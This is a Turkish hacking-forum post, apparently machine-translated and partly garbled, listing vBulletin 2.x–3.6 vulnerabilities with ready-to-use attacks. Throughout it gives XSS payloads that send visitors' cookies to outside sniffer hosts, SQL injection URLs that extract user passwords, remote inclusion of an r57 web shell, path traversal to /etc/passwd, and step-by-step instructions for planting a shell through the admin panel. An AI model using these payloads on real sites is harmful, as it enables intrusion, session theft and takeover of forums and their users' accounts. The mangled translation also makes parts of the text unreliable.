İnsanlar açıkları vBulletin]

BEYAGU

Katılımcı Üye
25 Ara 2015
671
0
forumda phpbb ipb yorumlar ve güvenlik açıkları var, ben açıkları bir inceleme yapmaya karar verdi vBulletin ) -. Yani başlayacağız.
Roach üç şube açığını göz önünde bulundurun: .. 2 * , . * 3.0 ve . 3.1 * . . Biz yeni bir konu öğrenmek klasörde / clientscript / birkaç kolay js ve css dosyaları, forumun tam sürümünü görebilirsiniz.



Kodu:
[COLOR = YellowGreen] vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.js
Örnek: [/ COLOR]
Kodu:
[RENK = YellowGreen] www.xz.som / Forumpath / clientscript / vbulletin_editor.css [/ color]

Bu sistem 2

. 2.2 * - 2.2.4 - keyfi kod Yürütme
. Açığı Açıklaması: (calender.php) vBulletin Takvim PHP betikleri bir güvenlik açığı uzak saldırganların kullanıcı 'kimse' bağlamında rasgele kod yürütmesine olanak
: Exploit http: //www.securitylab. ru / güvenlik açığı / -source / 207147.php


. 2.3 * - SQL injection
Opisante açığı: 'calendar.php' girdi verilerinin doğrulanması bir güvenlik açığı. Bir uzak kullanıcı keyfi SQL komutları enjekte edebilir.
Örnek:
Kodu:
[RENK = YellowGreen] www.xz.som / Forumpath / calendar.php? S = & action = edit & OlayNo = 14 sendika (NEREDE EventID,) (, calendar_events GELEN kimliği sürümü '0000-0-0' allowsmilies, kamu, kimliği SEÇ = EVENTDATE 14) sipariş [/ COLOR]
.. 2 * * - XSS
açığı. Açığı nedeniyle e-posta etiketi işleme eksikliği neden olur
Exploit:
Kodu:
[COLOR = YellowGreen] [E * POSTA] [email protected] " 's =' [/ S * POSTA] 'sss =" i = new Image (); i.src = 'http :? //antichat.ru/cgi-bin/s.jpg' + ********.cookie = üst this.sss = null "tarzı: ifade (eval (this.sss)); [/ COLOR ]
Video: http://video.antichat.ru/file57.html





Yardım 3.0

3.0.0 - XSS
Güvenlik Açığı Açıklaması: bir güvenlik açığı komut search.php bulunmaktadır. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve betik kodu çalıştırmak için kullanılabilir.
Örnek:
Kodu:
[RENK = YellowGreen] www.xz.som / Forumpath // search.php yapmak = süreç & showposts = 0 & sorgu = ********** img = new Image () ?; img.src = "http://antichat.ru/cgi-bin/s.jpg?" + ********.cookie; </ script>
[/ COLOR]
3.0-3.0.4 - Keyfi komut çalıştırma
açığı: Güvenlik açığı nedeniyle global değişkenler yanlış kullanımdan forumdisplay.php senaryoda bulunmaktadır. Bu sistemde keyfi komutları çalıştırmak için özel olarak hazırlanmış bir URL yoluyla kullanılabilir.
Örnek:
Kodu:
www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
Burada okunan komutlar hakkında: http://turkhackteamthreadnav7345-1-10.html

3.0.3-3.0.9 XSS
Güvenlik Açığı Açıklaması: Bir güvenlik açığı Durumu alanında giriş verilerinin işlenmesi bulunmaktadır. Bu etkilenen bir sitenin bağlamında kullanıcının tarayıcı oturumunda keyfi HTML komut dosyası çalıştırmak için istismar edilebilir.
Not: varsayılan durumunu değiştirmek için can sadece yönetim, grup moderatörlerin.
Örnek:
Kodu:
[COLOR = YellowGreen] <body onLoad = img = new Image (); img.src = "http://turkhackteam/cgi-bin/s.jpg?"+********.cookie;>[/COLOR]
3.0.9 ve 3.5.4 - XSS
Güvenlik Açığı Açıklaması: nedeniyle giriş verileri işleme eksikliği var zvimost komut newthread.php parametre posthash. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve script kodları çalıştırmak için özel olarak hazırlanmış bir POST isteği aracılığıyla kullanılabilir.
Örnek:
Kodu:
= Yeni Resim (); img.src =


vBulletin 3.5

3.5.2 - XSS
Güvenlik Açığı Açıklaması: bir güvenlik açığı komut dosyası "calendar.php" alan "başlığında" giriş verilerinin işlenmesi bulunmaktadır. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve betik kodu çalıştırmak için kullanılabilir.
Örnek:
Kodu:
[RENK = YellowGreen] ADI: ---------> Test ********** img = new Image (); img.src = "http://turkhackteam/cgi-bin/s.jpg?" + ********.cookie; </ script>
VÜCUT: ----------> olursa olsun
DİĞER SEÇENEKLER: -> olursa olsun [/ COLOR]
Açıklama: Biz takvime gitmek, biz yeni bir etkinlik oluşturmak için basın ve başlık buyurulur ********** img = new Image ( ); = Img.src "http://antichat.ru/cgi-bin/s.jpg?" + ********.cookie; </ script> , bizim olay için bağlantıyı ve ne çerez çalmak isteyen vparivayut bak. 3.5.3 - XSS açığı: güvenlik açığı nedeniyle modülü "Edit E-posta & Şifre" alan "E-posta Adresi" yetersiz giriş veri işleme kaynaklanıyor. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve betik kodu çalıştırmak için kullanılabilir. Not: Başarılı sömürü seçenekleri "E-posta özelliklerini etkinleştirin" ve "Kullanıcılar Diğer üyeye e-posta izin ver" ne zaman mevcuttur . Örnek:




Kodu:
[RENK = YellowGreen] www.xz.som / Forumpath / profile.php? Do = EditPassword
pass: pass
E-posta: [email protected] "> ********** img = new Image (); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>.nomatt
uzunluğu sınırlama Hakkında Not
****
Forum / profile.php? do = Editoptions
evet = Diğer Üyelerden E-posta al
****
www.xz.som / Forumpath / sendmessage.php? do = mailmember & u = {senin id} [/ COLOR]
Açıklama: Biz profilinde gitmek ve e-posta reçete "> ********** img = [email protected] ) (yeni Image; = Img.src "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>.nomatt . Unutmayın. Daha sonra da bütün görünür e-postanızın seçenekleri koymak. Şimdi birileri bağlantısını kandırmak www.xz.som / Forumpath / sendmessage.php? Do = mailmember & u = {senin id} , {senin id} senin id. . Cookie sniffer gidecek 3.5.4 - Veritabanı dökümü açığını: Güvenlik açığı neden olduğu yetersiz kısıtlamalar erişim 'install' dizinde senaryoyu upgrade_301.php için. Bu bir veritabanı uygulaması dökümü özel hazırlanmış bir URL yoluyla kullanılabilir. Örnek:



Kodu:
[COLOR = YellowGreen] www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord [/ COLOR]

3.5.4 - XSS
açığı: Güvenlik açığı nedeniyle parametre url inlinemod.php senaryoda yetersiz girdi veri işleme kaynaklanıyor. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve script kodları çalıştırmak için özel olarak hazırlanmış bir POST isteği aracılığıyla kullanılabilir.
Örnek:
Kodu:
www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a



modüllerinde Güvenlik Açıkları vBulletin.

VBug Tracker 3.5.1 - XSS
açığı: Güvenlik açığı nedeniyle vbugs.php senaryosu "sortorder" parametresinde yetersiz girdi veri işleme kaynaklanıyor. Bu etkilenen bir sitenin bağlamında bir kullanıcının tarayıcı oturumunda keyfi HTML ve betik kodu çalıştırmak için kullanılabilir.
Örnek:
Kodu:
= Yeni Resim (); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;%3C/script%3E[/COLOR]
ImpEx 1.74 - PHP-inklyuding ve komut yürütme
güvenlik açığı: Güvenlik açığı nedeniyle ImpExData.php senaryosunda parametresi "systempath" yetersiz giriş veri işleme kaynaklanıyor. Bu sunucu Web ayrıcalıklarıyla hedef sistemde keyfi PHP komut dosyası çalıştırmak için kullanılabilir.
Örnek:
Kodu:
[COLOR = YellowGreen] (1)
www.xz.som / Forumpath / impex / ImpExData.php systempath = http :? //rst.****.ru/download/r57shell.txt
www.xz.som / Forumpath / impex / ImpExData.php? systempath = .. / .. / .. / .. / .. / .. / .. / .. / etc / passwd
(2)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(4)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
[/ COLOR]
Exploit: 404 -

ibProArcade 2.x - SQL Injection
açıkları: bir güvenlik açığı Kullanıcı parametre index.php komut giriş verilerinin işlenmesi modülü "Rapor" bulunmaktadır. Bu uygulama veritabanında keyfi SQL komutları çalıştırmak için özel olarak hazırlanmış bir URL yoluyla kullanılabilir.
Örnek:
Kodu:
[RENK = YellowGreen] www.xz.som / Forumpath / index.php? Yasası = ibProArcade & modül = raporu ve kullanıcı = -1 kullanıcıdan sendika seçme şifre nerede kimliği = [any_user] [/ COLOR]
Nerede [any_user] id biz kullanıcıyı istenilen. Konu sniffer belirtilen XSS c kullanırken. Kayıtlar buraya bakın: http://turkhackteam/sniff/log.php Ama kendinize bir algılayıcı bulmak için iyidir -). Bu burada yapılabilir http://antichat.ru/sniffer : ya da burada http://s.netsec.ru . Powered Shell. Biz yönetici roach kabuk doldurmak için nasıl anlayacaksınız. * Powered 2 yöntem kabuk doldurun ve .. 3,0. * 1. Biz yönetici paneline gidin. 2.. Smiles. 3.. gülümseme indirin. 4.. Bizim kabuk yükleyin. (Varsayılan klasör / images / smilies) 5. Git www.xz.som / Forumpath / images / smilies / shell.php Not:. Her yerde işe yaramaz vBulletin 3.5 kabuk yöntemi doldurun * .. 1. Biz yönetici paneline gidin. 2.. Sistem modülleri. 3. . Yeni bir modül ekleyin Ürün: set vBulletin Yer: Vbulletin: SSS - faq_complete Yapıştır kodu bizim kabuğun gövdesine (kabuk 60KB geçmemelidir), daha kolaydır içine yapılacak sistem ($ _ [ "cmd GET "]); 4. Tüm şimdi kabuk var, sss (referans) gidin kaydedin. böyle bir olsaydı sistemi ($ _ GET [ "cmd ;"]) yapıyor ? yani www.xz.som / Forumpath / faq.php cmd = Sonra ekip video üzerinde Önemle yemin değil. bir yerde bir şey eksik ise doğru, yanlış ise, eklemek değil ... XSS bazı vylazhivat çünkü Sürüm onlar tekrarladı ...















































1. 19-08-2006 Son moderatör tarafından düzenlendi: 2014/10/25
Bu 27 polzoveteley onaylar.
palet
kanatçık
Elder - Elder
Kayıt Ol:2006/09/05
Mesajlar:138
Onaylar:85
İtibar:18
Pasif XSS vBulletin 3.6.x Admin Kontrol Painel

başka bir ek:
Kodu:
Yazar: insanity
E-mail: [email protected]

XSS vBulletin 3.6.1 Admin Kontrol Paneli

http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs=">**********alert("insanity")</script>
http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs=">**********alert("insanity")</script>
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.